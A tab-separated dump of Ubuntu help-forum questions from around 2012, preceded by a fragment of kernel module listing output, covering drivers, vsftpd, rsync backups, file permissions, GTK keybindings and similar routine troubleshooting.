drm_kms_helper snd_seq_midi_event 14899 1 snd_seq_midi snd_hwdep 13668 1 snd_hda_codec snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event i2c_algo_bit 13423 1 nouveau mxm_wmi 12979 1 nouveau wmi 19256 1 mxm_wmi mac_hid 13253 0 snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec psmouse 97362 0 video 19596 1 nouveau snd_timer 29990 2 snd_seq , snd_pcm snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 78855 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_rawmidi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_seq , snd_pcm , snd_timer , snd_seq_device serio_raw 13211 0 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm mei 41616 0 lp 17799 0 parport 46562 3 ppdev , parport_pc , lp r8169 62099 0
193322	how to copy playlist from banshee to mp3 player ?	i have an android phone which i use as a music player , and i use banshee to manage the music on my computer . i can copy music fairly easily from banshee to the phone , i can even copy the music ( mp3s ) contained in a playlist . what i would like to do is copy the playlist itself , but that is apparently not so straightforward . what i have tried : drag and drop the playlist from the computer to the phone ( under devices ) . this copies all the mp3 files across . right-click on the device and select 'new playlist ' . then tried dragging and dropping the contents of the playlist on my computer into the playlist on the phone . it would not let me . right-click on the playlist on the computer and 'export playlist ' , then save it to the android phone . this came close , but the folder structure was all wrong , so it could n't find the music . this seems like it should be a pretty straightforward process - is there a way to do it , or are there extensions that will let me do it ? if necessary , i could use rhythmbox instead , but it seems that is equally unable to do this .
193325	vsftpd : default to local user subdirectory	the goal : when a local user logs in to ftp , the user is directed to /home/ { username } /htdocs . the expectation is that filezilla or equivalent will show / and the contents of /home/ { username } /htdocs below like this : /- -file1 -file2 |-dir1 |-dir2 the closest i can get is to see / as /home/ { username } and then its contents below . /- |-htdocs |-file1 |-file2 |-dir1 |-dir2 i have tried multiple variations on the configurations suggested by all the postings on vsftpd but none seem to get me where i want to go . either one ca n't get there from here or i 'm missing something . i 've pared vsftpd.conf to a minimum : listen=yes anonymous_enable=no local_enable=yes write_enable=yes dirmessage_enable=yes use_localtime=yes connect_from_port_20=yes virtual_use_local_privs=yes # chroot_local_user=yes user_config_dir=/etc/vsftp/users with /etc/vsftp/users containing a file named { username } containing local_root=/home/ { username } /htdocs this does n't get me where i want to go . so , what am i missing ? [ note : this is in anticipation of no result to my question about proftpd earlier ] thanks . george
193327	do you get preloaded drivers + os on system 76 laptops ?	i 'm looking forward in buying a system76 notebook . my question : is the x64 ubuntu 12.04 the exact same one from the website or do you get a tweaked , driver preloaded os ? thanks .
193331	package dependencies can not be resolved : flashplugin	this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details : the following packages have unmet dependencies : flashplugin-installer : how can i fix this ?
193333	drivers are not detected on my dell inspiron 5420 ( 14r 3rd generation )	i 'm using dell inspiron 5420 ( 14r 3rd generation ) , and tried to install ubuntu 10.10 , 11.10 , 12.04 , 12.04.1 but each and every time , it does n't support any of my driver such as network card , wireless driver , video driver and as well as audio and touch-pad driver . audio , video and touch-pad works with their basic functionality but do n't work with their full functionality . i 'm a new user of ubuntu , and willing to use it permanently . in this condition i tried some solutions from the web but did n't get out from this problem . for this i 'm knocking to you , if you give me the proper solution for getting out of this problem , i 'll be very grateful to you all .
193336	is there a free trusted vmware image with ubuntu preinstalled ?	since the vmware virtual machine drivers are pretty standard i do n't see any technical reason for a preinstalled image not to be portable . although the above situation is obvious , i did n't find any preinstalled vmware image for ubuntu . is there a trusted free vmware image or an ovf image with ubuntu preinstalled ? note : ovf image works with most of the players !
193342	installing ubuntu with a previously installed windows 8	i had windows 8 installed in my pc , and now i 've tried to install ubuntu 12.04 , but at end of installation an error message appears : grub can not be installed . is there any way to install it without corrupting my windows 8 installation ?
193345	byobu not displaying correct cpu temptrature	i have an amd fx 8120 proccy that is overclocked to 4100mhz . since the overclocking , byobu and other temprature reading apps ( conky , etc ) do not read the temprature accurately . i can see the correct temp in the bios , and with no overclocking everything inside of gnome reads correctly . why should this be ? it is ( seemingly ) obviously an issue with ubuntu ( or perhaps gnome ? ) . has anyone else experienced this ?
193347	touchpad right-click does n't work on my asus notebook	i just installed 12.04 and i noticed that my touchpad 's right-click is n't working at all . my touchpad is working fine for 2 finger scrolling it also worked fine under windows 7 . the touchpad has a physical click , but i do n't know if it knows the difference between left and right click . is there some kind of solution for this problem ?
193348	what are the executable names of mysql client and admin application ( gui ) ?	i 've tried searching for for my mysql client and manager using dash home , and can not find them . i 've tried using find on the command line , but do n't know what the application names are respectively . these two applications were migrated from 10.04 , and both ubuntu software and synaptic say they 're installed . how do i find them , so i can either put them into the status bar or create desktop icons ?
193356	intel i7 runs slow on ubuntu 12.04	my pc is a intel core i7 ( bought 3 months ago ) . i 've tested code routines against a friend of mine who has an old intel core 2 duo and , to my surprise , his pc runs routines faster than mine . is there anything that may be causing this ?
193357	how do i create a popup banner before login with lightdm ?	when ubuntu was using gnome i was able to create a popup banner like the banner below before the login screen using zenity in the /etc/gdm/init/default . the line of code would be like this : if [ -f `` /usr/bin/zenity '' ] ; then /usr/bin/zenity -- info -- text= '' `cat /etc/issue` '' -- no-wrap ; else xmessage -file /etc/issue -button ok -geometry 540x480 ; fi how can i accomplish this with unity ? notice to users this is a computer system and/or it is directly connected to a local network system . it is for authorized use only . users ( authorized or unauthorized ) have no explicit or implicit expectation of privacy . any or all uses of this system and all files on this system may be intercepted , monitored , recorded , copied , audited , inspected , and disclosed to authorized site , department of energy , and law enforcement personnel , as well as authorized officials of other agencies , both domestic and foreign . by using this system , the user consents to such interception , monitoring , recording , copying , auditing , inspection , and disclosure at the discretion of authorized site or personnel . unauthorized or improper use of this system may result in administrative disciplinary action and civil and criminal penalties . by continuing to use this system you indicate your awareness of and consent to these terms and conditions of use . log off immediately if you do not agree to the conditions stated in this warning .
193361	how to determine if a package is a meta-package from the command line ?	how can i determine if a package is a meta-package from the command line , possibly via apt-get , aptitude or apt-cache ? i have tried : apt-cache show texlive-full apt-cache showpkg texlive-full but the only way i can tell this package is meta is by reading the `` en-description '' field . is there a more automatic way of doing this , that will give me a yes/no response , or at least have a field such as then `` en-description '' dedicated to this ?
193362	how to clean install on reformated disc ?	how do i install ubuntu on a freshly re-formatted hard-drive ? the machine has a cd player but the ubuntu iso is on a dvd that the player wo n't read . the iso is about 50mb too large for a cd . what to do ?
193364	why would remmina stop working ?	until sometime last night , i had remmina working fine . i could run rdp through an ssh tunnel and all was well . then it stopped working . i can get as far as the password dialog for my work machine , but then it just says `` can not connect to rdp server localhost '' . i ca n't even find any logs that look interesting . i 've re-installed remmina , cleared my .remmina directory , restarted my machine , and even restarted my gateway . just to make it really weird , my laptop ( which has the same setup -- latest ubuntu and remmina ) can make the connection just fine . it is even going through the same router , albeit wirelessly . any thoughts ?
193370	wine / playonlinux dependency issues when trying to install	i am curious as to why installing playonlinux entails removing seemingly unrelated packages like google-earth-stable . is this the expected behaviour ? this is the output i get when trying to install playonlinux through apt-get : the following packages were automatically installed and are no longer required : python-scour pax ncurses-term use 'apt-get autoremove ' to remove them . the following extra packages will be installed : binfmt-support fonts-horai-umefont fonts-unfonts-core libcapi20-3 libgif4 : i386 libmpg123-0 libodbc1 libpam-winbind ttf-umefont ttf-unfonts-core unixodbc winbind wine wine-gecko1.4 wine-gecko1.4 : i386 wine1.4 wine1.4-amd64 wine1.4-common wine1.4-i386 : i386 winetricks suggested packages : libmyodbc odbc-postgresql tdsodbc unixodbc-bin dosbox recommended packages : gettext : i386 unixodbc : i386 the following packages will be removed : alien cdbs debhelper dh-make dh-translations gettext google-earth-stable intltool intltool-debian lsb-core po-debconf the following new packages will be installed : binfmt-support fonts-horai-umefont fonts-unfonts-core libcapi20-3 libgif4 : i386 libmpg123-0 libodbc1 libpam-winbind playonlinux ttf-umefont ttf-unfonts-core unixodbc winbind wine wine-gecko1.4 wine-gecko1.4 : i386 wine1.4 wine1.4-amd64 wine1.4-common wine1.4-i386 : i386 winetricks 0 upgraded , 21 newly installed , 11 to remove and 0 not upgraded . need to get 145 mb of archives . after this operation , 275 mb of additional disk space will be used . this is the first time i am trying to install wine / pol . i am using the default repositories , no wine ppa or pol source added . these are all the ppas i am using : how do i install pol / wine without having to remove all these packages ?
193371	dell wireless not working after upgrade	so , the short version of my sad story is that i tried upgrade ubuntu to 12.04 and wireless driver has stopped working . i have tried all the solutions but nothing seem to be working . when i try to install my wireless from `` additional drivers '' its says : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log the lspci command gives me the following info about wireless : 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) i have tried removing bcm drivers and reinstalling , but nothing seems to be working . rfkill is good too .
193374	graphics card dilemma	looking to update my graphics card and can not decide between the geforce gts 450 or gtx 550ti . i 'm not really a gamer . looking for easy install and stability more than anything . anybody had any great success or problems with any of these cards ? any info would be most appreciated . using ubuntu 12.04 .
193375	why does compiling the `` alx '' driver from `` compat-wireless '' fail ?	trying to compile the compat-wireless-2012-09-25 driver module , without success . scrips/driver-select alx ; works make ; fails - scripts/makefile.build:44 ~/sourcecode/compat-wireless-2012-09-25.2/drivers/net/ethernet/atheros/alx/makefile : no such file or directory make [ 4 ] : ** no rule to make target '~/sourcecode/compat-wireless-2012-09-25.2/drivers/net/ethernet/atheros/alx/makefile ' . stop . [ snip ] make : * [ modules ] error 2 device is atheros ar8161 wired ethernet in a dell vostro 3460 . i 'd be very grateful for assistance in getting this to compile .
193376	disable touchpad while typing	how can i disable the touchpad while typing on kde ? is there such a setting like in gnome ?
193377	keybindings for individual letter keys ( not modifier-combinations ) on a gtktextview widget ( gtk3 and pygi )	i 've been able to set several keybord shortcuts for a gtktextview and a gtktextentry using the new css provider system . i 'm finding , though , that i only seem to be able to establish keybindings for combinations including a modifier key . the widget does n't respond to any bindings i set up that use : the delete key the escape key individual letter or punctuation keys alone here 's the code where i set up the css provider for the keybindings : # set up style context keys = gtk.cssprovider ( ) keys.load_from_path ( os.path.join ( data_path , 'keybindings.css ' ) ) # set up style contexts and css providers widgets = { 'window ' : self.window , 'vbox ' : self.vbox , 'toolbar ' : self.toolbar , 'search_entry ' : self.search_entry , 'paned ' : self.paned , 'notelist_treeview ' : self.notelist_treeview , 'notelist_window ' : self.notelist_window , 'notetext_window ' : self.notetext_window , 'editor ' : self.editor , 'statusbar ' : self.statusbar } for l , w in widgets.iteritems ( ) : w.get_style_context ( ) .add_provider ( keys , gtk.style_provider_priority_user ) then in keybindings.css this is an example of what works : @ binding-set gtk-vi-text-view { bind `` < ctrl > b '' { `` move-cursor '' ( display-lines , -5 , 0 ) } ; /* 5 lines up */ bind `` < ctrl > k '' { `` move-cursor '' ( display-lines , -1 , 0 ) } ; /* down */ bind `` < ctrl > j '' { `` move-cursor '' ( display-lines , 1 , 0 ) } ; /* up */ } part of what i 'm trying to do is just add proper delete-key function to the text widgets ( right now the delete key does nothing at all ) . so if i add a binding like one of these , nothing happens : bind `` delete '' { `` delete-selection '' ( ) } ; bind `` delete '' { `` delete-from-cursor '' ( chars , 1 ) } ; the other part of what i want to do is more elaborate . i want to set up something like vim 's command and visual modes . so at the moment i 'm just playing around with ( a ) setting the widget to editable=false by hitting the esc key ; and ( b ) using homerow letters to move the cursor ( as a proof-of-concept exercise ) . so far there 's no response from the escape key or from the letter keys , even though the bindings work when i apply them to modifier-key combinations . for example , i do this in the css for the text-widget : bind `` j '' { `` move-cursor '' ( display-lines , 1 , 0 ) } ; /* down */ bind `` k '' { `` move-cursor '' ( display-lines , -1 , 0 ) } ; /* up */ bind `` l '' { `` move-cursor '' ( logical-positions , 1 , 0 ) } ; /* right */ bind `` h '' { `` move-cursor '' ( logical-positions , -1 , 0 ) } ; /* left */ but none of these bindings does anything , even if other bindings in the same set are respected . what 's especially odd is that the vim-like movement bindings above are respected when i attach them to a gtktreeview widget for navigating the tree-view options : @ binding-set gtk-vi-tree-view { bind `` j '' { `` move-cursor '' ( display-lines , 1 ) } ; /* selection down */ bind `` k '' { `` move-cursor '' ( display-lines , -1 ) } ; /* selection up */ } so it seems like there are limitations or overrides of some kind on keybindings for the textview widget ( and for the del key ? ) , but i ca n't find documentation of anything like that . are these just things that ca n't be done with the css providers ? if so , what are my alternatives for non-modified keybindings ? thanks .
193391	how do i display chinese/japanese characters in a linux vt console ?	i have an installer program which runs in a default ubuntu 12.04 linux vt console and uses the `` dialog '' program to display simple graphical input boxes . after the user selects either chinese or japanese and my installer sets the lang=zh_cn.utf8 and lang=ja_jp.utf8 , the output characters turn all to diamonds . i figured that i needed to run setfont to one of the fonts in /usr/share/consolefonts but examining the fonts there , i do not find one that looks chinese or japanese . a few google searches have let me to pages which indicate the linux 's console does not support these languages and that i would need another console program to gain that capability . 1 ) is it true that the default linux console does not provide support for japanese or chinese ? 2 ) if it does have support , what do i need to do in order to enable it ? if fonts are required , what would their names be or where can they be obtained as an ubuntu package ? 3 ) if it does not have support , does another console ( zhcon or chdrv ) provide such support ? will they work in vt mode ( i have up to 8 virtual terminals running ) ? what is the process for installing and using such a console ? 4 ) can a replacement console be used for all my other languages ? that is , do console replacements like chrdrv support the ability to display the characters for all the other languages ? thanks in advance . roger r. cruz
193392	ati video driver failing ( `` badrequest '' ) after installation	i am running ubuntu 12.04 ; the pc 's graphics card is a radeon hd797m , with intel switchable graphics . my problem seems similar to some already reported ( e.g . here ) but the solutions in https : //help.ubuntu.com/community/binarydriverhowto/ati fail in my case . the last i 've tried is the manual installation of the catalyst drivers , for the case for intel/ati hybrid graphics . fglrxinfo returns : $ fglrxinfo x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 ccc refuses to start , with the message : '' no amd graphics driver is installed , or the amd driver is not functioning properly . please install the amd driver appropriate for you amd hardware , or configure using aticonfig . `` , and $ aticonfig aticonfig : no supported adapters detected these errors are independent of the way the installation of fglrx is done ( which always seems to go smoothly ) ; it occurred in the default configuration of pangolin straight after installation . in the manual installation route , for example , step 7. sudo ./amd-driver-installer-12-6-x86.x86_64.run runs fine , but step 8. fails like aticonfig $ sudo amdconfig -- initial amdconfig : no supported adapters detected ( by the same token , -- uninstall also fails ) . any help greatly appreciated
193403	problems in libreoffice writer when saving as .docx	i used libreoffice for a really important task and now i am going nuts . i check if everything is ok before closing libreoffice , nothing seems wrong . but when i reopen the document , i noticed that some of the photos shifted to right and the page numbers ' colors have changed . ( also some spaces are changed . ) what can be the reason for that ? ( i am saving the documents as .docx ) i need really urgent help .
193404	how to make my sound settings automatically switch	i know that if i plug in my ear phones , i have to go to sound settings and switch to the earphones in order for ubuntu to play through them , instead of my speakers . i was wondering if there was a way to make ubuntu automatically switch the sound settings . if so , why is n't this default ?
193406	error in running ubuntu from my usb . my windows is corrupted	i tried running ubuntu 12.04 desktop from a usb , got an error back . using ubuntu by running it virtually to recover my files , windows is kinda corrupted . my computer specs : computer : hp pavillion dv 9000 os : windows vista 32 bit cpu : amd athon x2 graphics : nvidia geforce go 7150 wireless : broadcom all the process shows ok onthe right until the squasfs errors like 28.267297 : squashfs error : zilb_inflate error , data probably corrupt `` 324 : : squashfs_read_data failed to read block 0x275fcda4 `` 340 : : unable to read fragment cache entry [ 275fcda ] `` 351 : : `` page , bock 275fcda4 , size 6eb7 so do i need to give anymore information , and please tell me there is a solution . my finals are coming up and my assignments are stuck in the hardisk , crap imma fail .
193407	how to enable headphones on lenovo thinkpad edge e430 ?	i 've a lenovo thinkpad edge e430 . i use headphones provided by lenovo . today afternoon i did an update and now my headphones are n't working in ubuntu . sucks not being ablet o hear music while programming . is anyone facing similar problem ? any known fix ?
193408	why is vim not launching when passing arguments in its .desktop file ?	i have vim.desktop file in ~/.local/share/applications/ directory with these lines : [ desktop entry ] name=vim text editor comment=edit text files tryexec=vim exec=vim terminal=true type=application icon=terminal categories=utility ; texteditor ; startupnotify=true mimetype=text/plain ; this .desktop file works fine at this point ( i.e . i can search in unity dashboard it and click it to open vim ) but i wanted more from this desktop file . i wanted to start it in insert mode , so i changed some parts of it , like : tryexec=vim -c 'startinsert' exec=vim -c 'startinsert' but as soon as i save this file i am not able to search it .
193411	hot key to type today 's date ?	is there some way to set up a hot key that will type today 's date into the current window as if i had typed it ?
193414	bcm4311 `` wireless is disabled by a hardware switch ''	i am running a hp pavilion dv6000 with bcm4311 . i am new to ubuntu and admittedly am rather unfamiliar with running code in terminal . i have tried a dozen different ways i have found online and nothing works . i have disabled the broadcom sta driver and reisntalled b43-fwcutter . it runs a wired connection but it is hardblocked and have been getting frustrated . any help ? thanks yal
193416	adding timestamps to terminal prompts ?	i was wondering if it was possible to add timestamps to terminal prompts , and if so , how could i achieve this ?
193421	multiple preinstalled programs with similar jobs	i have unity , gnome-shell and xubuntu on my laptop . they all have their favorite preinstalled programs it seems . do i really need three text editors for example ? could i remove two and just have the other desktops use the one i keep ? it seems as though i could get rid of all video playback programs as well and just use vlc for example . am i going to mess something up ? i am new to all this .
193424	assigning different directory permission for each different groups	i am running ubuntu 12.04 64bit server on ext4 . there are four user groups - marketing , sales , admin and etc . i need to assign different permissions to /archive as follows : rw for the marketing group r for the sales group rwx for the admin group w for the etc user group how exactly can i achieve this ?
193425	rsync takes more space than source	this is my cron task for rsync 00 03 * * * /usr/bin/rsync -- delete -aaxv /* /media/mirror -- exclude= { /dev/* , /proc/* , /sys/* , /tmp/* , /run/* , /mnt/* , /media/* , /lost+found , /home/*/.gvfs } & & /bin/date | /bin/cat > /home/william/ubuntu-server-backup/last_rsync.txt this is in root 's crontab . the destination drive ( mirror ) has the same capacity as the main disk . i verified , and the symbolic links are still links , they have not been copied twice . what am i doing wrong ? edit : i just checked , and it looks like ''/media '' is not excluded . why ? i got my command from the arch wiki .
193426	writable permission is not writable	i am running ubuntu 12.04 x64 server on ext4 partition . i set a directory 's permission to '766 ' as below . sudo chmod 766 /archive drwxrw-rw- 3 root root 4096 sep 27 10:50 archive/ but , when i tried to create new file through vi editor , permission error has occured . vi /archive/test.txt -- -- -- -- > `` /archive/test.txt '' [ permission denied ] i thought i had `` write '' permission . could anyone help me what is the problem ?
193430	i ca n't login to facebook from any browser	i 'm using ubuntu 12.04 . i 'm having problems with facebook . it really hard to login . takes like 3 or 5 min . at first i thought it was a flash problem but then i realized it could be some proxy 's conf file . other sites does n't have problems . yesterday i tried tor-browser-bundle and i installed privoxy using this rules http : //www.neilvandyke.org/privoxy-rules/ . today i removed privoxy and the conf file with the ubuntu software center and ubuntu-tweak . i do n't really find the problem and my windows pc does not have any problem with the same modem . i do n't have an isp 's proxy it just a direct internet connection using automatic dhcp . maybe i am missing something else . but i want to be sure so , i 'm asking .
193449	how can i run the wubi installer in a different language ?	my copy of windows is in a language that i do n't know . i want to install ubuntu via the ( windows-based ) wubi installer . how can i change the language so that i can read it ?
193451	can not use https ( secure connection ) on firefox	suddenly i can not access any https connection . firefox shows an error error code : ssl_error_rx_record_too_long even i can not access google ( http ) . it shows blank page most of the time . i did not do anything at all . i googled about ssl error but all indicated apache2 virtual-host fact . but i do n't have apache installed in my system . i did not change any kind of config file . so why is it happening ? i am using a modem ( with wifi router facilities ) . other computers in this network are working just fine . i am using 12.04 64bit . system date is okay ( synchronize with time server ) .
193452	disable hibernate while accessing network	how can you prevent ubuntu from entering hibernate mode while there is network activity ?
193453	iptable rules https block in zentyal	i am using zentyal . i want to block https : //www.facebook.com with iptables rules . can you please tell how to block it for my organization 's network ?
193455	how do i fix a bad windows installation in ubuntu ?	basically , there was a security issue in the drivers for my graphics card . it was a 64-bit card and i installed 32-bit windows . apparently , before sp1 was available , which fixed that issue , 6 trojan horses got in . they stopped sp1 from installing . after going through the ringer several times , i finally talked to a person who knew the problem . it was something about how the drivers tried to transfer between the 32-bit os and the 64-bit card that left me open . ever since , my computer has been slow and has had weird issues . like tinypic would n't ever load . also , certain programs would n't install . so i eventually talk to the dude that knew the problem and he takes the reigns and does some diagnostics . he tells me that to fix it i have to format the hard drive and do a fresh install . i 'm okay with that because i was planning on it anyway , to upgrade to the 64-bit version . the problem is , how do i do that ? i have the disk to install the new copy , but when i go to install it , it tells me i ca n't and to check the log file . however , i do n't know where that log file is , and it wiped my install of windows out . how do i find the file and as a different route to get to the goal , how do i zero out the drive from ubuntu 12.04 ? ( i installed the 64-bit version just the other day )
193458	how to recover lost files after an install	i 'm a newbie learning along the way . i recently installed a 2nd hdd into my ubuntu box . have one of about 160g which runs ubuntu 12.04 . and the new hdd was 1 tb , used for holding videos . i had set up 2nd drive as ext3 i believe . and set up folders on it to hold the videos . worked great . also thought i had set it up for auto mount . i was able to read and write on it . etc . computer froze , so had to reboot it . when i did , system would not reboot : hung on the ubuntu screen with 5 dots . i hit a few buttons and the command screen showed up , indicating that my 2nd hdd would not mount . stopped up whole system . tried rebooting , no go . had to reinstall ubuntu on the 1st hdd . did not apparently touch the 2nd one . well , when i got it up and running , my 2nd hdd mounted automatically ( yeah ! ) , but now i can not find my videos i already had on it . i had not put any more than about 30g of videos on it , but now when i read its properties , it says i 'm using about 50g . so , i 'm wondering if somewhere in that , buried , are my 17 videos . any help in recovering this ? thanks !
193460	ubuntu system monitor shows 4 cpu while i have 2 cores	acording to my laptop website and intel website , my cpu is intel i5-2410m processor number i5-2410m cores 2 threads 4 clock speed 2.3 ghz max turbo frequency 2.9 ghz so i have two cores , but why does ubuntu 12.04 show 4 cpus for my cpu ?
193464	fallback mode on intel hd 4000 on ubuntu 12.04.1 ?	just built a system w/ a ivy bridge cpu ( xeon e3-1245 v2 ) with intel hd 4000 onboard graphics , board is an asrock h77 prom . i had loaded ubuntu server 12.04.1 onto it , but wanted to fool around w/ gnome 3 . i installed gnome-shell , which did n't work , then gnome , which did , but only loads on fallback mode - the video is recognized as `` vesa : sandy/ivy bridge graphics '' i tried installing the whole ubuntu-desktop shebang but it 's still in fallback graphics . any way to get the full eye candy ?
193465	setting path for apache	i installed apache2 on my local machine , and when typing which apache2 it returns : /usr/sbin/apache2 and when trying setting path for apache2 by using the following command : sudo apache2 -settingpath /usr/sbin/apache2 it failed ! it failed because whenever i restart apache2 using apache2 restart , i always receive error message telling me that i used the wrong user id . so could you help me set path for apache http server on ubuntu 12.04 ?
193466	samsung np355v5c-s03in laptop function key is not working	i have a samsung np355v5c-s03in laptop . when using the function key to control volume , it is stuck . the wireless key is not working either . please advise me on a good driver for my motherboard .
193468	associate home folder with file drive	i am new to ubuntu and wondering how i can associate the tags in the home folder ( pictures , doc etc ) to my files on a disk partition . i can easily do that in win 7 but so far i can only find it under 'devices ' in ubuntu . thanks , chris
193469	how to share desktop to an additional monitor	how to share desktop to an additional monitor ? i tried , but it looks not good . the external monitor resolution is as same as my laptop .
193471	ca n't change or add keyborad layout in ubuntu	i am a new in ubuntu and still learning to use it . but in some ways i get the error as below and i ca n't google it to find an answer . if someone please see this error : error activating xkb configuration . there can be various reasons for that . if you report this situation as a bug , include the results of xprop -root | grep xkb gsettings get org.gnome.libgnomekbd.keyboard model gsettings get org.gnome.libgnomekbd.keyboard layouts gsettings get org.gnome.libgnomekbd.keyboard options
193472	admin password is not working	i changed my password to nothing , and now , the password does n't work ! i thought that it will make me no more need to write in passwords , but instead it just made me get no access to the admin user . i am a newbie , so please explain very good . thanks
193478	wine - ynhub port problem	i host a hub using ynhub on windows with port 10.22.24.228:511 . i want to continue the hub on ubuntu . i could n't find ynhub software for linux , so i tried opening it with wine . but hosting ports more than 1023 only works . it shows up this error if i tried to host with port 511 : failed to start listening on port 511 , port may be inuse and same errors respectively for all ports less than 1024 . can i do anything to host my hub ( using ynhub ) with 511 port ? otherwise i will have to lose all my users . please help .
193482	broadcom bluetooth device remains undetected ( bcm2046 , widcomm )	lspci output : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) lsusb output : broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) rfkill list output : 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no ..but my wifi works fine . in windows i had to install dell wirless 365 bluetooth driver to get it working . i installed blueman in ubuntu , but it does n't show any bluetooth adapter . when i try to apply a kernel patch described here , it ends up saying : patching file src/wl/sys/wl_linux.c hunk # 1 failed at 332 . 1 out of 1 hunk failed -- saving rejects to file src/wl/sys/wl_linux.c.rej thanks for any help ...
193483	ppa : ikarosdev/unity-revamped stopped working after installing updates	i had installed unity-revamped package thta adds windows dodge behavior to unity launcher , it was working flawlessly all these but yesterday after i installed some common updates it has stopped working . i tried adding the ppa again and ran update and upgrade but it di n't work ! anybody else facing the same issue ?
193489	squeak-vm in ubuntu 12.04 arm	there is a squeak-vm package for ubuntu 12.04 here : squeak-vm armhf binary . using ubuntu for arm on my toshiba ac100 i ca n't find this package when i search for it with aptitude . do i have to add additional repositories ? -- edit 2012-09-27 20:21 -- universe is activated in my sources.list : deb http : //ports.ubuntu.com/ubuntu-ports/ precise main restricted multiverse universe deb-src http : //ports.ubuntu.com/ubuntu-ports/ precise restricted main multiverse universe # added by software-properties deb http : //ports.ubuntu.com/ubuntu-ports/ precise-updates main restricted multiverse universe deb-src http : //ports.ubuntu.com/ubuntu-ports/ precise-updates restricted main multiverse universe # added by software-properties deb http : //ports.ubuntu.com/ubuntu-ports/ precise-security main restricted multiverse universe deb-src http : //ports.ubuntu.com/ubuntu-ports/ precise-security restricted main multiverse universe # added by software-properties when i search with aptitude , the following packages are found : marc @ toshi : ~ $ sudo aptitude search squeak v squeak-image-gz - p squeak-image3.9 - das squeak-smalltalk-system ( abbild und ănderungsprotokoll ) p squeak-plugin-image - das squeak-smalltalk-system ( abbild und ănderungsprotokoll ) p squeak-plugins-scratch - squeak plugins for the scratch programming environment p squeak-plugins-scratch-dbg - squeak plugins for the scratch programming environment - debug p squeak-sources3 - das squeak-smalltalk-system ( quelltext ) p squeak-sources3.9 - das squeak-smalltalk-system ( quelltext ) i 'm still missing squeak-vm : - (
193497	ubuntu 12.04 is not waking up after sleep	not able to wake up my system after sleep . it just hangs , its neither taking input from key-board nor from mouse . even when i tries to make system sleep by ctrl + alt + l , system hangs . in both cases all that i can do is to forcefully shutdown system and reboot . $ : uname -a linux ankur-desktop 3.2.0-30-generic-pae # 48-ubuntu smp fri aug 24 17:14:09 utc 2012 i686 i686 i386 gnu/linux
193498	dictionary for 12.04	is there any dictionary supported by 12.04 which has the feature of word capture by use of few key strokes from my keyboard ?
193504	i install ubuntu 12.4 and i have no screen saver	i install ubuntu 12.4 lts on my notebook acer aod270 , and i noticed that there is no icon under the dash home for the screen saver , the only thing is a power management icon that sets the screen blank after a while , as far as i understand there should be a screen saver because i have seen videos for other notebooks with the same os that do have it , is n't something that should come with the installation ? how can i get it ? please help .
193507	rhythmbox ca n't organize artist/title from file names	i ca n't seem to get rhythmbox to detect artist , title , and album names from my file system . currently in preferences , i have folder hierarchy set to artist and file name set to title - this i assumed meant that if i had ~/music/billy joel/we did n't start the fire.mp3 that rhythmbox would detect ( and sort ) this as the title `` we did n't start the fire '' by `` billy joel '' . i also tried setting ~/music/billy joel as a library , but that did n't help . i also tried resetting config/prefs/etc per this question , also to no avail . am i doing something wrong ?
193513	problem adding a ppa to install gcc-4.7	i want to install gcc compiler 4.7 to use c++11 features . i have looked on the internet for instructions , and i found in several websites these steps : sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update sudo apt-get install gcc-4.7 g++-4.7 the problem is that my console freezes when adding the ppa . at first i thought it was due to having an old ubuntu version ( 11.04 ) . so i have upgraded to 11.10 and then 12.04 , and everything seems to work ok . but still having the same problem . any help ?
193517	ruined ubuntu bubble notifications	i do n't know now , but somehow today i ruined my bubble notifications in ubuntu 12.04 now my bubble notifications look like the ones in the pictures : huge , out of place and ugly . i have tried notify-osd to correct this problem , but it does n't do anything . can anyone tell me how i can reverse to what they look like in default ubuntu ? i 'm using ubuntu 12.04 64 bit with gnome-session-fallback . pictures
193524	how to hide bind mounts in nautilus ?	summary : how do i remove folders mounted via bind or bindfs in /etc/fstab from appearing as devices in nautilus left column , the `` places '' view ? detailed : hello , i mount various directories from my data partition via bind in /etc/fstab in my home directory , eg like this : # using bind : /mnt/sda5/bazon/musik /home/bazon/musik none bind , user 0 0 # or using bindfs bindfs # /mnt/sda5/tobi/downloads /home/tobi/downloads fuse user 0 0 ( background : /dev/sda5 mounted to /mnt/sda5 is my old home partition , but i do not want to mount it as a home partition , as i always have at least 2 linuxes on the computer ... ) that works well , but since 12.10 every one of those items is listed in nautilus in the left column under `` devices '' . ( where normally usb drives appear , etc . ) this is a waste of space ( as i have many of such mounts ... ) and so i would like to have these mounts hidden , just as it was before in 12.04 . how can i do that ? thanks !
193527	mouse touch pad becomes unresponsive some times	i have a dual boot laptop with windows 7 and ubuntu 11.10 loaded.things have been working fine i am using ubuntu 11.10 from past 1.5 years , recently i came up with this problem that the touchpad stops responding to movement i.e . touch of finger on it . i thought it could be a hardware issue and started using windows 7 on same system but then after conitnuous usage for many days i did not faced this issue on windows 7 but upon a reboot the touch pad becomes unsensitive while working and in that situation my only way is to press ctrl+alt+t and open terminal issue sudo reboot and login again then the touchpad works . what could be the problem ?
